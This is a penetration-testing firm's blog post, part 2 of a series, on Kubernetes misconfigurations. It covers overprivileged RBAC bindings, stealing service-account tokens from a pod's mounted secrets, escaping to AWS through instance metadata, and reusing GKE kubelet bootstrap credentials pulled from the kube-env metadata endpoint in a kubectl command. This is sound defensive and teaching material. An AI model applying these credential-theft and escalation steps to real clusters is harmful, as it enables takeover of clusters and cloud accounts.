A Pentester’s Approach to Kubernetes Security — Part 2
This is the second of the two-part blog series. Part 1 is covered here — https://blog.appsecco.com/a-pentesters-approach-to-kubernetes-security-part-1-2b328252954a
We will continue and conclude with some more misconfigurations that have led to exciting results during our pentesting engagements.
Vulnerabilities and Misconfigurations
The misconfigurations covered in this post arise from going overboard with privilege assignments, either due to overlapping permission sets or poor implementation knowledge, especially with cloud-managed clusters. Additionally, exposing unauthenticated management dashboards to the Internet is always a bad idea.
Permissions and Poor Privilege RBAC Management
Kubernetes RBAC is implemented by assigning permissions (verbs) as a group (roles/clusterroles) using an association (rolebindings/clusterrolebindings) to a user, group or service account.
Basically, a user or service account can be assigned a permission (or a set of permissions) via a role bound together with a rolebinding. Roles and Rolebindings are limited to specific namespaces whereas ClusterRoles and ClusterRoleBindings are cluster-wide.
A common misconfiguration I come across is when overprivileged rolebindings and clusterrolebindings are assigned to arbitrary users, the default service accounts, or even worse to the system:anonymous
account. Here’s an example of an overprivileged service account having cluster-admin access via the app-admin-deployer
ClusterRoleBinding.
An attacker can use the ca.crt
and token
from here to become cluster administrator. These two values can be accessed from a pod’s mounted file system as well via the /var/run/secrets/kubernetes.io/serviceaccount
path
To discover overprivileged service accounts or users, follow these steps
- List all
clusterroles
, for eachclusterrole
obtain the verbs assigned using-o json
- Identify any overprivileged
clusterroles
that can perform CRUD operations or the notorious value of“*”
- List all
clusterrolebindings
and look forclusterrolebindings
that have a privilegedclusterrole
attached - For each of these
clusterrolebindings
use-o json
and identify the service accounts and users listed undersubjects
section - For each subject across each problematic
clusterrolebinding
, evaluate where it is being used.
ClusterRoleBindings give privileges across the entire cluster and in most cases can be detected easily with tools, however RoleBindings for each namespace are not usually inspected by tools. These can be used to build cluster-wide permission scope (imagine rolebindings across each namespace giving admin privileges individually making it the same as cluster-wide admin). The attacker in such cases would work with a ca.crt
and token
for each namespace individually to mimic cluster-wide access.
Cloud IAM, K8S mapping and Cluster to Cloud Escape
Cloud-managed clusters like EKS and GKE implement an RBAC mapping layer between the cloud platform layer and Kubernetes so that any cloud IAM user provisioned to work with Kubernetes, can be assigned appropriate roles within the cluster.
In AWS, for example, you can follow this guide to see how an AWS IAM user, who did not create the cluster, can be assigned a Kubernetes user role.
https://kloudle.com/academy/allowing-iam-users-to-access-aws-eks-using-kubectl/
Imagine a scenario where an AWS IAM user (let’s call this user eksadmin
) exists, who can create an EKS Cluster but does not have access to other services like AWS S3 or IAM. If the role, AmazonEKSNodeRole
in this case, attached to the Cluster Node Group EC2 instances is over-privileged like it is as shown in the screenshot below, the eksadmin
IAM user would be able to gain access to these other privileges via the nodes instance profile.
The eksadmin
user can generate a kubeconfig
file and use it to exec into a running pod. Once in the pod, the user can use the AWS cli directly or generate privileged temporary credentials using the STS service via IMDS on the nodes.
These credentials will have the same privileges as the AmazonEKSNodeRole
IAM role, which in this case, will give full access to IAM and S3 as well.
For GKE, accessing the http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env endpoint contains the values for CA_CERT
, KUBELET_CERT
, and KUBELET_KEY
which are the initial bootstrap credentials the kubelet uses when attaching the node to the GKE cluster.
These can be used to construct a kubeconfig yaml to access the cluster or used directly in the command line
kubectl -s=https://cluster-server-ip \
--client-certificate=/path/to/kubelet.crt \
--client-key=/path/to/kubelet.key \
--certificate-authority=/path/to/ca.crt \
get nodes
This, however, only works on GKE clusters that have Shielded Nodes disabled AND have legacy metadata endpoint enabled, both of which are non-default settings, making this attack rare in modern day GKE clusters.
Additionally, the privileges obtained via the bootstrap credentials only have CertificateSigningRequests (CSR) permission, which need to be additionally exploited to generate fake CSR to escalate privileges.
For non Shielded GKE nodes, you can use a tool like kubeletmein to automate CSR generation for a non existing node and get a certificate in return from the kube-controller-manager which can be used to construct a kubeconfig with higher privileges.
GKE, generally presents a harder attack and exploitation experience via its more modern defaults.
Exposed Cluster Administration Dashboards
The most common way of managing Kubernetes clusters is using the kubectl binary. Kubectl essentially makes HTTP and websocket requests to the Kubernetes API server. There are other UI products that can be used to interact with the control plane API like the Kubernetes dashboard, Weave Scope, Lens etc.
Usually, these management tools have authentication requirements but in the in the worst cases, these dashboards are accessible over the Internet without any authentication. A quick Shodan/Censys search will give you some very interesting results 😱
These are live results, so recommend you do not interact with the clusters that you discover using Censys or Shodan.
An attacker can simply pick a target, run pods, bring down deployments, exec into running pods, ping sweep and port scan adjacent pods and computes, extract tokens and certificates, reach the instance metadata service endpoints, extract cloud env variables and credentials and escape to the cloud layer. The possibilities are limitless for an attacker.
Conclusion
This post covers common misconfigurations with Kubernetes clusters around permissions, privileges and RBAC. Also, misconfigurations that can be abused to escalate privileges to eventually escape to the cloud layer are also covered.
OSINT tools like Shodan and Censys can also be used to find misconfigured Kubernetes dashboards that can allow for a complete takeover of the cluster and potentially the cloud platform also, via additional over-privileged role permissions.
PS: Our Kubernetes Penetration Testing as a Service offering can be used to run a real world penetration test on your clusters to assess its security. Drop in a hello to riyaz@appsecco.com to know more!